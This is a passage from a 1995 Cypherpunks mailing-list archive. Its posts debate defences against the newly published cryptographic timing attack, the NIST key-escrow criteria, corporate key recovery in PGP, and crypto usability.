here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tomw at netscape.com Mon Dec 11 22:01:08 1995 From: tomw at netscape.com (Tom Weinstein) Date: Tue, 12 Dec 1995 14:01:08 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <199512111815.NAA02202@jekyll.piermont.com> Message-ID: <30CC9B8C.6201@netscape.com> Perry E. Metzger wrote: > > The trivial way to handle this is simply to check user time with the > right system calls and make sure it always comes out the same with an > apropriate number of sleeps. The problem with that approach is that if the system is heavily loaded, it can take an arbitrarily large amount of user time. Somewhat better is to sleep for a random amount of time after you're done. That will smear out the time distribution making it harder to get a statistically meaningful number of samples. It also increases your latency, but doesn't hurt throughput on a busy system. -- Sure we spend a lot of money, but that doesn't mean | Tom Weinstein we *do* anything. -- Washington DC motto | tomw at netscape.com From perobich at ingr.com Mon Dec 11 22:04:33 1995 From: perobich at ingr.com (Robichaux, Paul E) Date: Tue, 12 Dec 1995 14:04:33 +0800 Subject: ViaCrypt supports CKE in PGP Message-ID: In today's mailbox I got a pack of marketing slicks from ViaCrypt. They're about to release ViaCrypt PGP 4.0 in two editions: Personal and Business. The 4.0 release adds some nice new features: - recipient groups for sending to several addresses at once - a Search dialog for finding keys - encryption-only & decryption-only keys - signature-only keys - key expiration dates - a Windows DLL that third-party developers can use (!!) The biggie, though, are these: "Encryption automatically includes Corporate Access Key as additional recipient (option)" and "Key selection/display dialogs show only keys certified by Corporate Access Key (option)" So, real CKE will soon be available from an unexpected source. I'm not sure whether to be excited or dismayed. On the one hand, any movement towards CKE seems dangerously close to the slippery slope of GAK. On the other hand, I know a large corp like Intergraph is much more likely to license PGP for internal use if it has CKE features-- especially since they can hold the keys internally. The DLL is an awfully nice feature, too. -Paul -- Paul Robichaux, KD4JZG | perobich at ingr.com Intergraph Corporation | http://www.intergraph.com Be a cryptography user. | Not speaking for Intergraph Co-author, "Building Internet Appls With Visual C++", Que Books (0-7897-0213-4) From andrew_loewenstern at il.us.swissbank.com Mon Dec 11 22:05:35 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Tue, 12 Dec 1995 14:05:35 +0800 Subject: NIST GAK meeting writeup, LONG part 3 of 3 Message-ID: <9512120039.AA00574@ch1d157nwk> Pat Farrell writes in his report on thi NIST GAK meeting: >>Geoff said that they may want legislation support for >>protecting against illegal release of keys, failure to release, etc. Jim Bell Responds: > Pardon me, but since this "key escrow" system was always claimed > to be "voluntary," then how can there be any kind of legal penalties > associated with "failure to release" those keys? well, since the subject at hand is Escrow Agent Criteria, "Geoff" is probably talking about the failure of an escrow agent to release a key upon production of "lawful authorization" .... andrew From futplex at pseudonym.com Mon Dec 11 22:06:28 1995 From: futplex at pseudonym.com (Futplex) Date: Tue, 12 Dec 1995 14:06:28 +0800 Subject: DES Cryptanalysis In-Reply-To: <30cc40ff3f57002@noc.cis.umn.edu> Message-ID: <199512112328.SAA06771@thor.cs.umass.edu> Kevin L. Prigge writes: > I'm looking for pointers, or perhaps an explanation of the statement > I found in Applied Cryptography (section 9.6) where it implies > that if the IV is not unique in CFB mode, the cryptanalyst can recover the > plaintext. > > The reason that this interests me is that I have a file, encrypted > with DES in CFB mode. I believe I know the first 8 bytes of plaintext > and I also know the IV used. I don't believe you have much cause for hope here. The IV usually accompanies the ciphertext in the clear. Knowing the first 8 bytes of plaintext gives you precious little additional information in CFB mode, for the purposes of decryption. (It looks like you might be able to reconstruct the ciphertext of the encrypted IV, giving you a single plaintext/ciphertext pair, but that's about it....) Generally it's advisable to use a different IV for each encryption to avoid correlations between the ciphertexts for plaintexts that have the same prefix. If you always used the same IV, then two messages that start with the same text would encrypt to the same initial piece of ciphertext. (This is not the only reason, but I think it's the main one.) -Futplex From jimbell at pacifier.com Mon Dec 11 22:13:08 1995 From: jimbell at pacifier.com (jim bell) Date: Tue, 12 Dec 1995 14:13:08 +0800 Subject: NIST GAK meeting writeup, LONG part 3 of 3 Message-ID: At 11:04 AM 12/10/95 -0800, you wrote: > >NIST Key Export meeting, December 5, 1995 Long version >Part 3 of 3. > >This covers the notes on agent criteria, and the >industry presentations. > [stuff deleted] > >Geoff said that they may want legislation support for >protecting against illegal release of keys, failure to release, etc. Pardon me, but since this "key escrow" system was always claimed to be "voluntary," then how can there be any kind of legal penalties associated with "failure to release" those keys? Which raises another question: Let's suppose I owned a product based on CKE, and I went to the escrow agent and said, "This escrow is voluntary, right? If so, erase my key in your possession." Not that I'd trust them to do so, but how "voluntary" can a system be if people can't volunteer out of it? From eli+ at GS160.SP.CS.CMU.EDU Mon Dec 11 22:16:14 1995 From: eli+ at GS160.SP.CS.CMU.EDU (eli+ at GS160.SP.CS.CMU.EDU) Date: Tue, 12 Dec 1995 14:16:14 +0800 Subject: Timing Attacks In-Reply-To: <+cmu.andrew.internet.cypherpunks+Qkn8QTu00UfAE0yrN:@andrew.cmu.edu> Message-ID: <9512112205.AA07602@toad.com> samman-ben at CS.YALE.EDU writes: >I'm not so sure I see the great usefulness of this attack. It appears to be more practical than 99 percent of the "weaknesses" that get published. Not bad, I'd say. It's also a very cute attack; I'd never have guessed a priori that you could get that many key bits from timing data. >work in a lab, with the current advances in computing speed, the >differences between a fast and a slow calculation can easily be opaqued >by network lag. "Random delays added to the processing time may increase the number of ciphertexts required, but do not completely solve the problem since attackers can compensate for the delay by collecting more measurements. (If enough random noise is added, the attack can become infeasible.)" [extended abstract, p. 5] Sufficient network noise *might* make the problem go away, in some cases, but that's a weak sort of claim to make about a cryptosystem. (What if the attacker tries at six in the morning, or cracks a machine local to you, or just gets lucky?) You might put your server behind a time-quantizing firewall... Also, it's not just networked machines. Smart cards may have a hard time defending themselves against hostile card readers. They're slow already; the user may not appreciate the extra time spent for obfuscation. (This depends critically on the numbers, of course.) -- Eli Brandt eli+ at cs.cmu.edu From unicorn at schloss.li Mon Dec 11 22:20:43 1995 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 12 Dec 1995 14:20:43 +0800 Subject: GAK and self-incrimination? In-Reply-To: <199512110749.XAA11099@ix2.ix.netcom.com> Message-ID: On Sun, 10 Dec 1995, Bill Stewart wrote: > At 02:57 AM 12/10/95 -0800, you wrote: > >The Fifth protects you against *compelled* self-incrimination - in > >particular, the right to be free from the "cruel trilemma" of > > > > o conviction of a substantive crime, based on your > > (true) testimony > > o conviction of perjury, for lying when asked to incriminate > > yourself > > o contempt of court sanctions, for refusing to answer > > Testimony was often compelled by more direct means than threatened > contempt citations. Piling rocks on people until they talked was > still in use in the 1600s, unless I've got my dates wrong. And later. The term 'pressing a defendant for a plea' came from the practice of piling heavy weights on a defendant and 'pressing' him into the very floor of the court. (As defendants who did not admit a plea would save their family from being held accountable to judgment, the incentive to remain silent was high). Often weight was piled atop the hapless defendant until he or she expired, having refused to enter a plea. > It may have gone out of fashion slightly after witch-burning, > but was still in recent cultural memory of the Constitution's authors. > #-- > # Thanks; Bill > # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com > # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 > > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From tcmay at got.net Mon Dec 11 22:22:30 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 12 Dec 1995 14:22:30 +0800 Subject: The origin of some heavy legal terms Message-ID: At 12:10 PM 12/11/95, Black Unicorn wrote: >The term 'pressing a defendant for a plea' came from the practice of >piling heavy weights on a defendant and 'pressing' him into the very >floor of the court. (As defendants who did not admit a plea would save >their family from being held accountable to judgment, the incentive to >remain silent was high). Often weight was piled atop the hapless >defendant until he or she expired, having refused to enter a plea. Modern courts have replaced the rocks used in earlier days with law books, of course. The need for heavy law books to press the accused is one of the main reasons electronic versions are not being adopted. This practice also gave us the term "the full weight of the law" as well as the symbol of the law as being a blind woman carrying a scale filled with rocks to place upon the guilty to convince them to confess. (This was originally done in the court's torture chamber, from which we get the term "judge's chamber.") Sometimes the "scales of justice" can be "tipped," which derives from the practice of tipping the judge to get favorable rulings. --Tim "Not a Lawyer" May From khijol!netcom.com!ecarp at cygnus.com Mon Dec 11 22:27:46 1995 From: khijol!netcom.com!ecarp at cygnus.com (Ed Carp (ecarp@netcom.com)) Date: Tue, 12 Dec 1995 14:27:46 +0800 Subject: [NOISE] GAK and self-incrimination? Message-ID: <199512112018.OAA11102@khijol> > Date: Mon, 11 Dec 1995 09:01:40 -0500 > To: Bill Stewart > Subject: Re: [NOISE] GAK and self-incrimination? > From: tallpaul at pipeline.com (tallpaul) > Cc: cypherpunks at toad.com > If I'm not guilty why do I want strong crypto? Sometimes for the same > reason I want a shredder. And why do I want a shredder? Sometimes just to > keep the local gossip from going through my papers after I throw them out. Another, not-so-obvious reason to encrypt stuff, especially stuff that goes out over the net, is that folks can suck your email off the net and gather all sorts of useful information. This has all kinds of annoying implications, especially for people who gather demographics and other data for constructing email lists for sale. -- short ed From futplex at pseudonym.com Tue Dec 12 14:34:43 1995 From: futplex at pseudonym.com (Futplex) Date: Tue, 12 Dec 95 14:34:43 PST Subject: Time-based cryptanalysis: How to defeat it? In-Reply-To: <199512110854.AAA14652@ix2.ix.netcom.com> Message-ID: <199512122233.RAA21952@opine.cs.umass.edu> Bill Stewart writes: > The most interesting detail in the paper, to me, was: > > PK> Computing optional Ri+1 calculations regardless of whether the exponent > PK> bit is set does not work and can actually make the attack easier; > PK> the computations still diverge but attackers no longer have to identify > PK> the lack of a correlation for adjacent zero exponent bits. > > My immediate reaction to the description of the timing attack on > Diffie-Hellman had, of course, been to do precisely that :-) I don't understand why Kocher's point is correct. For example, why do the times diverge with the following modification of the modexp algorithm on pg.2 of the abstract ? Algorithm to compute R = y^x mod n: Let R_0 = 1. Let y_0 = y. For i = 0 upto (bits_in_x - 1): Let M = (R_i * y_i) mod n. Let R_(i+1) = (bit i of x) * M + (1 - (bit i of x)) * R_i. Let y_(i+1) = (y_i)^2 mod n. End. (I suppose I should wait for the full paper....) -Futplex From pmonta at qualcomm.com Mon Dec 11 22:37:57 1995 From: pmonta at qualcomm.com (Peter Monta) Date: Tue, 12 Dec 1995 14:37:57 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <30CC02F5.4487@netscape.com> Message-ID: <199512112049.MAA26431@mage.qualcomm.com> > > I for one will probably add a flag for conditional compilation of my > > bignumber library so that it will take constant time. This may be a > > %10 slow down (using small windows exponentiation) which is trivial > > compared to the %30 speedup I will probably get when I implement a > > faster mod function :-). > > Careful. Even if you can make the number of executed instructions the > same, you still have to worry about timing differences due to branches > and the way the hardware multiplier handles different operands. No, he's saying to equalize wall-clock time---just pad out beyond the largest possible execution time with a timer. Surely with a sufficient pad the timing-channel leak can be made negligible (though the author seems to claim otherwise---I should read the explanation!). Peter Monta From adam at lighthouse.homeport.org Mon Dec 11 22:39:12 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Tue, 12 Dec 1995 14:39:12 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <30CC0D31.293C@netscape.com> Message-ID: <199512112125.QAA07753@homeport.org> Jeff Weinstein wrote: | PS - I think Paul was a bit surprised when Jim Barksdale pulled | out his wallet and handed him 10 crisp $100 bills. :-) Great. mention it where the IRS is sure to be listening. :) -- "It is seldom that liberty of any kind is lost all at once." -Hume From turner at TeleCheck.com Mon Dec 11 22:50:02 1995 From: turner at TeleCheck.com (turner at TeleCheck.com) Date: Tue, 12 Dec 1995 14:50:02 +0800 Subject: In pursuit of the perfect frisbie (was NSA flying disk...) In-Reply-To: Message-ID: <9512112033.AA00608@mercury.telecheck.com> > <..snip..> > obtaining one of these fine flying disks. > (http://www.communities.com/foo/NSAfris.gif) > > If you'd care to discuss this matter with Mr. Cisco yourself, > he can be reached at: (301) 688 0701. Note that this is in > Maryland. Also, the (301) 688 0606 number listed on the frisbee > seems to be either always busy or not answered -- I'm assuming > it's the # for the NSA tech transfer office. > I also tried the public affairs department of the National Security Agency at (301) 688-6524, with no luck. They gave me the number of the technology transfer office. From then on out it was nothing but busy signals. (I guess there are many c'punks hammering them with phone calls...) > Please let me know if any of you have better luck. > I spoke with Mr. Cisco for several minutes, but he stated that the NSA would not be at any trade shows in the Southern United States any time soon. He did state that they would be in Salt Lake, sometime in the near future. In a fit of dispair, I called the local branch office of the Central Intelligence Agency only to get an answering machine, in an attempt to get the number for public affairs office. (Maybe they have a cool flying disk...) I called the direct number for the Central Intelligence Agency and was grudingly transferred to the public affairs office. I was then given the number to the store that sells CIA stuff at (703) 821-1414. [sigh] They don't have frisbies, but they do have the official CIA shot glasses... From perry at piermont.com Mon Dec 11 22:55:20 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 12 Dec 1995 14:55:20 +0800 Subject: Timing Cryptanalysis Attack In-Reply-To: <30CC9B8C.6201@netscape.com> Message-ID: <199512120100.UAA00263@jekyll.piermont.com> Tom Weinstein writes: > Perry E. Metzger wrote: > > The trivial way to handle this is simply to check user time with the > > right system calls and make sure it always comes out the same with an > > apropriate number of sleeps. > > The problem with that approach is that if the system is heavily loaded, > it can take an arbitrarily large amount of user time. Totally untrue. The process can take an arbitrary amount of wall clock time, not user time. In the case of the heavily loaded machine, the problem is gone -- the opponent can't precisely predict this. Provided you take the same amount of process time no matter what, you are okay. (To be technical, user time doesn't pass during sleeps, but that doesn't matter -- the problem gets fixed anyway). > Somewhat better is to sleep for a random amount of time after you're > done. I don't think so. First of all, you can still extract some information. If you have been gone as long as the maximum computation plus the maximum random fudge, you know that you had to have conducted the maximum computation. This means that some bits are indeed leaking. Your approach also has the disadvantage that it is hard to produce good random numbers -- you are perhaps familiar with that problem? Perry From trei at process.com Mon Dec 11 22:58:25 1995 From: trei at process.com (Peter Trei) Date: Tue, 12 Dec 1995 14:58:25 +0800 Subject: Timing Cryptanalysis Attack Message-ID: <9512112128.AA06989@toad.com> > > People employing systems like PGP are already advised to use them > > on private machines, with only one user, and untampered-with > > binaries. > > Timings like the ones listed are trivial to take in establishing > things like SSL sessions, or Photuris sessions. The danger is to > online protocols, not to PGP. > Perry Loathe as I am to disagree with Perry :-), is it really 'trivial' to take these timings in an online protocol? Paul writes on the DH example: ------------------------- A preliminary implementation of the attack using the RSAREF toolkit[8] has been written. RSAREF scans across the exponent from MSB to LSB and does two exponent bits at a time, so corresponding adjustments to the attack were made. Using a 120-MHz PentiumTM computer running MSDOSTM, a 512-bit modulus, and a 256-bit secret exponent, processing times ranged from 392411 microseconds to 393612 microseconds and closely approximated a normal distribution with a mean of 393017 microseconds and a standard deviation of 188 microseconds. -------------------------- Note that the range is 1201 microseconds and for RSA: -------------------------- RSAREF's modular reduction function with a 512-bit modulus on the same 120-MHz PentiumTM computer takes an average of approximately 17 microseconds less time if c is slightly smaller than p, as opposed to slightly larger than p. Timing measurements of many ciphertexts can be combined to detect whether the chosen ciphertexts are larger or smaller than p. ------------------------- The range here is 17 microseconds. Paul notes: --------------------------- Random delays added to the processing time may increase the number of ciphertexts required, but do not completely solve the problem since attackers can compensate for the delay by collecting more measurements. (If enough random noise is added, the attack can become infeasible.) -------------------------- In a 'real' system, there is a lot of unpredictable variation in the timing of the signal. Sources of such noise include routers, and other sessions on the server (any decent server these days is multi-tasking, and can handle multiple connections simultaneously). On top of that, real protocols have a lot of processing overhead, looking up certificates and keys, generating MAC hash values, etc, many of which are difficult to predict. I tried pinging some machines to look at the slop in the roundtrip times. I have not checked traceroute, but for what it's worth, I'm in central Massachusetts. elnath (local to my lan) <10 ms rtfm.mit.edu (20 miles) 10-21 ms iii1.iii.net (FreeBSD on a 120MHz P5, 35 miles) 100-200 ms utopia.hacktic.nl (Netherlands) 190-781 ms Maybe Paul can give us some figures as to how *much* random noise is enough to make his (very elegant!) attack unfeasible. Note that the range of the random slop I'm getting is hundreds to thousands of times the range of the signal he needs to detect. Statistical techniques, averaging the return times for the same text over many trials may be useful, but the number required to detect a less than 1% variation is going to be high. The attack might be feasible of it can be mounted on a quiet server from a point 'close' (in network terms) to the timing system, and the intervening network segments are also fairly quiet. I don't think random users are going to crack the Dilbert Store, however. Speaking for myself.... Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From tallpaul at pipeline.com Mon Dec 11 22:58:46 1995 From: tallpaul at pipeline.com (tallpaul) Date: Tue, 12 Dec 1995 14:58:46 +0800 Subject: Third generation privacy Message-ID: <199512112050.PAA12912@pipe3.nyc.pipeline.com> On Dec 11, 1995 13:07:22, '"Ed Carp (ecarp at netcom.com)" ' wrote: > >Another, not-so-obvious reason to encrypt stuff, especially stuff >that goes out over the net, is that folks can suck your email off the >net and gather all sorts of useful information. This has all kinds >of annoying implications, especially for people who gather >demographics and other data for constructing email lists for sale. > >-- short ed > Another related issue is what I'll call "third generation" privacy. This exists when I want privacy not for myself or even the person with whom I'm communicating but to protect the privacy of innocent third parties. E.g.: Grandpa is getting senile and I'm communicating with a second family member on how we should handle the problem; My friend Jane was just raped and I'm communicating with a mutual friend about how we can help her. The anti-freedom forces have tried to define the parameters of the debate inside the boundaries of the "four horsemen." We need to understand that we do not have to remain within those false boundaries and, in fact, it is very good not to. --tallpaul From pfarrell at netcom.com Mon Dec 11 23:04:44 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Tue, 12 Dec 1995 15:04:44 +0800 Subject: NIST GAK meeting writeup, part 3 of 3 Message-ID: <62487.pfarrell@netcom.com> I appologise to the list for the character mangling in the original posting. I wrote it in Word so I could spellcheck it, and I couldn't turn OFF the idiotic smartquotes. I've placed a cleaned up, fewer typo, and hyperlinked version out on my NIST page, http://www.isse.gmu.edu/~pfarrell/nist/pdf.nist2.html jim bell writes: >> Geoff said that they may want legislation support for >> protecting against illegal release of keys, failure to release, etc. > Pardon me, but since this "key escrow" system was always claimed to be > "voluntary," then how can there be any kind of legal penalties associated > with "failure to release" those keys? It was Geoff G. talking, not Mike Nelson or Ed Appel. The difference is critical. Mike and Ed have some political savvy. My best friend Geoff does not. I believe that Geoff has never bought into "voluntary" as a concept. EPIC successfully FOIA'd papers from the FBI saying that they will change their tune when/if there isn't sufficient compliance. Mike and Ed are political enough to know that they can't sell this if they push too hard. Geoff isn't. The podium had a light that showed green/yellow/red lights. These let the speakers know how much time was left. For the morning, since only NIST/NSA/FBI/... folks talked, they didn't bother to reset the light. It was red all the time, altho it blinked occasionally. Ed took the mike, and asked "what is the red light for? Does it glow red whenever someone from the Government is lying?" It got a good chuckle. It was probably also close to being true. Ed and Mike understand the audience, Geoff never will. > Which raises another question: Let's suppose I owned a product based on > CKE, and I went to the escrow agent and said, "This escrow is voluntary, > right? If so, erase my key in your possession." > > Not that I'd trust them to do so, but how "voluntary" can a system be if > people can't volunteer out of it? It isn't voluntary for export approved software. The word voluntary is not in the criteria. It is only voluntary if domestic users foolishly choose to buy GAK'd products. So don't! Criteria #2 says "...cryptographic functions shall be inoperable until the key(s) is escrowed in accordance with #3." Worse, IMHO, is criteria #9, which states " ... cryptographic functions shall interoperate only with key escrow cryptographic functions in products that meet these criteria..." The interoperability issues stayed muddy. The government didn't spend much effort making it clearer. The karma seemed to be that if you had two products, say Webscape 128 and Webscape 64/Gak, selling 128 domestically and 64/GAK exported, that you can't make Webscape128 interoperate with 64/GAK unless the Webscape128 keys are GAKed. Part of this is burried in agent criteria #6, "6. Escrow agent entities that are certified by the U.S. government shall work with developers of key escrow encryption products to develop and support a feature that allows the product to verify to one another that the product's keys have been escrowed with a U.S.-certified agent." Looks to me like the software has to chase up the chain of certification authorities (or escrow authorities if you prefer) before it can work. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From wilcoxb at taussky.cs.colorado.edu Mon Dec 11 23:05:35 1995 From: wilcoxb at taussky.cs.colorado.edu (Bryce) Date: Tue, 12 Dec 1995 15:05:35 +0800 Subject: Usability of Cryptography (was Re: More FUD from First Virtual) In-Reply-To: Message-ID: <199512112006.NAA15060@taussky.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- An entity known as "Tense Hot Alien in Barn" wrote: > > This is exactly right. In fact, it isn't even just bad programmer > decisions; some of the complexity is really inherently needed for > security. PGP's notion of who you trust to certify keys, for example, > confuses the heck out of naive users, who want to "trust" anyone they > believe is a good person, not just people they believe are sophisticated > enough to sign keys. It's really hard to explain to some people why > they should say, "No, I don't trust Grandma." > > What a lot of people don't seem to realize is that, in crypto software, *********************************************************************** > there is a fundamental tradeoff between usability and security. You can *************************************************************** > simplify PGP (or similar software) to the point where it's easy to deal > with key management, but it will then be far more susceptible to > compromise. I'm glad that you are willing to state this opinion, Nathaniel, and take the flack that you are taking. I think that as the goals of cypherpunkism (ewww... I just invented a new "ism"...) *really* pertain to the *use* of cryptography by large groups of people-- and not merely to the mathematical details of cryptography-- that this issue is going to become overwhelmingly important in the very near future. I challenge you, however, to go beyond pointing this problem out and start suggesting some approaches to alleviating it. With your experience in doing security for a successful Internet transaction system, I would hope that you have valuable insights which can benefit all of us. To get to the point, I want to know if this "fundamental tradeoff" that you refer to is in fact *fundamental*. That is to say: is the product of the "security factor" and the "usability factor" a constant? Or are there methods which can be practically implemented to make strong cryptography easier for Joe Average to use without exposing Joe to unnecessary risks? I'm sure in a trivial sense that there are some such methods. For example (to pick on everyone's favorite crypto-for-the-masses), if PGP v1 and v2 had come in a nice menu-oriented shell, or with a nice API, then a hell of a lot more people would be using PGP now, and without reducing its effectiveness as far as I can see. I'm sure that the PGP guys are aware of this problem, and I am looking forward (as I'm sure many of us are) to PGP v3 with much anticipation. But this kind of gooey "user friendliness" is not sufficient to make crypto *really* convenient to learn and to use, nor is it sufficient to make Joe Average's use of crypto really secure. (Note the extreme sparsity of the current PGP Web O Trust, and the oft-lamented weakness of Joe's passphrase.) I have made a clumsy first shot at envisioning the kind of strong, convenient crypto that could perhaps bring the capabilities that we talk about here to the masses. I submitted this article to cpunks last week entitled "My conception of the ideal encryption tool for the masses", and it was picked up Robert Hettinga and echoed to his e$pam list. Unfortunately I have not received a single response to this article either in personal mail or in public. Was my article so poorly written? Or are the cpunks failing to realize the importance of the usability/security issue? I sincerely hope that Nathaniel and others can make progress in addressing this issue. Ultimately it will be as important as any issue in cryptography. Regards, Bryce P.S. I just went and re-read "My conception of the ideal encryption tool for the masses" and I think I failed to make something clear. The crypto device that I envision is *not* just useful for buying a pack of cigarettes at the grocery store. I could imagine it being used for *every* user-authentication purpose. You sit down at a terminal, plug your pocket-crypto-box into it, and read your private e-mail. You walk into a secure building, pass your pocket-crypto-box in front of the infra-red IO device, and the door opens for you. You negotiate a million-cyber-credit deal, you plug your pocket-c'box into the Net, and sign the contract. Etc. etc. In short, for the vast majority of your crypto needs you depend *entirely* upon the pocket-c'box and not upon passphrases and floppy disks. P.P.S. I am aware that this makes a physical attack upon your c'box into one of the few remaining viable attacks. I recommend that everyone carries a handgun next to their pocket c'box. Deadman switches, good police forces and other physical security, etc. will also be important. Since this technology is empowering individuals, it is also increasing the value of loot than can be gained by robbing an individual. Alley-bash the right person and you might be able to steal a personal fortune. Another issue that we who seek a better future through technology need to address. P.P.P.S. I can see that there is a major problem with my idea regarding the IO between the pocket-c'box and the user. Perhaps the pocket-c'box will have to come with trusted IO hardware (screen, keyboard, pointer-device, audio, vox-recog... but I digress...). P.P.P.P.S. Also note that the pocket c'box should probably hold many of your pseudonyms (i.e., many of your pseudonyms' private keys) and your Chaumian pseudonym-exchangeable credentials. P.P.P.P.P.S. Remember those under-$600.00 netstations? Even if they don't pan out this year, they will soon. And then they will move into our pockets, and into our wristwatches, etc etc. The cypherpunks need to be ready to offer Joe a *secure* computer to put into his pocket, so that he is carrying new capabilities and renewed privacy in his pocket, rather than carrying a little chunk of Big Brother. signatures follow "To strive, to seek, to find and not to yield." -Tennyson bryce at colorado.edu -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01 iQCVAwUBMMyPLfWZSllhfG25AQHPRQP/fwhKqyUdOv2/t/YCc68GQrNMOhCT69KE PVE27Fp3CYnx+lGgzynnh1kr9DlH/bOOQRGf+fjqbPswr7PDHUoMaTAnBFr8gzf3 eXPd9moyixjNvHXacMpl0I5A/0tr6Lt2N/L5FUTyMf5zecMzbEbuKyiQE8pOYajx COKJyTTk794= =4spo -----END PGP SIGNATURE----- From dsmith at midwest.net Mon Dec 11 23:19:07 1995 From: dsmith at midwest.net (David E. Smith) Date: Tue, 12 Dec 1995 15:19:07 +0800 Subject: Timing Cryptanalysis Attack Message-ID: <199512120558.XAA02070@cdale1.midwest.net> At 10:30 PM 12/11/95 CST, Martin Diehl wrote: > OTOH, maybe we _should_ try for constant computation time and then try > for *random* delay time. Remember that _we_ will spend a lot of real > time arguing whether the *random* delay is really _random_ Does it necessarily matter whether the random delay time is true-random? The idea is to obfuscate the time of the whole computation. As long as you don't base your random numbers on the system clock, it should serve its purpose. (I omit the system clock because timing seems to be the nexus of the whole attack, so we can safely assume that the clock's data, and thus its source of "randomness," can be predicted. ----- David E. Smith, c/o Southeast Missouri State University 1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814 PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/ Quote: "And if we change, well, I'll love you anyway" - Alice In Chains Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864 From sameer at c2.org Mon Dec 11 23:22:58 1995 From: sameer at c2.org (sameer) Date: Tue, 12 Dec 1995 15:22:58 +0800 Subject: More FUD from First Virtual [NOISE] In-Reply-To: <199512112215.RAA13271@bb.hks.net> Message-ID: <199512120519.VAA09715@infinity.c2.org> > > Maybe Sameer will create a Hack FV page :-) FV isn't worth it. Actually, Hack FV seems pretty pointless. Someone hacks FV, and a chargeback is issued on the credit card. Big deal. Same old outdated credit-card based payment systems. No more secure than credit cards. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From stewarts at ix.netcom.com Tue Dec 12 00:32:51 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 12 Dec 1995 16:32:51 +0800 Subject: More FUD from First Virtual [NOISE] Message-ID: <199512120654.WAA17948@ix12.ix.netcom.com> At 09:19 PM 12/11/95 -0800, sameer wrote: >> Maybe Sameer will create a Hack FV page :-) > > FV isn't worth it. > Actually, Hack FV seems pretty pointless. Someone hacks FV, >and a chargeback is issued on the credit card. Big deal. Same old >outdated credit-card based payment systems. > No more secure than credit cards. Besides, if you hack FV you've got the money :-) #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From OpsAn at gnn.com Tue Dec 12 00:36:30 1995 From: OpsAn at gnn.com (Michael Coates) Date: Tue, 12 Dec 1995 16:36:30 +0800 Subject: PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT" Message-ID: <199512120710.CAA07438@mail-e1b.gnn.com> PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT" Netscape Communications has awarded two software sleuths $1,000 each for finding security gaps in its Netscape Navigator 2.0 software. The company also awarded gifts to 50 other contestants in its "Bugs Bounty" program for identifying non-security problems. (Wall Street Journal 11 Dec 95 B7) Meanwhile, Netscape has vowed to wage a "dogfight" with Microsoft in setting standards for Internet software. CEO James Barksdale says his company will continue to develop products that operate independently of any particular computer operating system, noting that, "We offer freedom to the masses. It's a tough fight -- I'll grant you that -- but we're brave. We're well financed. We believe that God is on our side." (Investor's Business Daily 11 Dec 95 A7) From lyalc at mail.mpx.com.au Tue Dec 12 16:45:02 1995 From: lyalc at mail.mpx.com.au (lyal collins) Date: Tue, 12 Dec 95 16:45:02 PST Subject: Timing RSA and Certificates worth ?? Message-ID: My limited mind induces me to think that a certificate become subject to timing attacks on the RSA private signing key. This appears to meet the main critieria of fixed data (for instance, a bank's certificate in/on ecash), processed widely by a small group of machines (eg a subset of customers) on inherently untrusted machines (home PC's) which may or may not have the right software/operating system parts. Certificates in general, do not appear to lend themselves to "blinding". In this case, certificate verification processes seem flawed and highly unreliable. eg a merchant gets lots of data containing a bank(s) certificate, and probably encrypted data. Is this the death knell for STT/SEPP and ecash/echeque systems ??? Some ramblings and thoughts. lyal From stewarts at ix.netcom.com Tue Dec 12 00:52:15 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 12 Dec 1995 16:52:15 +0800 Subject: Timing Attack Paper Message-ID: <199512120729.XAA21395@ix12.ix.netcom.com> At 09:39 PM 12/11/95 CST, gibo wrote: >I went to > >http://www.cryptography.com/timingattack.html > >and found the whole thing to be totally incomprehensible from >a layman's point of view. I apologize for having not read >"Applied Cryptography", which might have made the abstract a >simpler read - but even if I had I'd have been baffled by a >lot of the terminology and equations in this paper. > >Can anyone post a brief summary which explains the essential >workings of the attack? I'd be very grateful. Briefly, most public-key calculations are _slow_, and use 512-2048-bit numbers which get represented as arrays of machine integers. The amount of time they take depends on the values you're multiplying together, especially because the algorithms used to do the arithmetic less slowly take shortcuts whenever possible to avoid unnecessary work. If you watch the time that it takes for a machine to do calculations using its private keys, for some algorithms you can guess a bit or two of the key. If you're clever, and have the ability to feed the victim different numbers for it to calculate 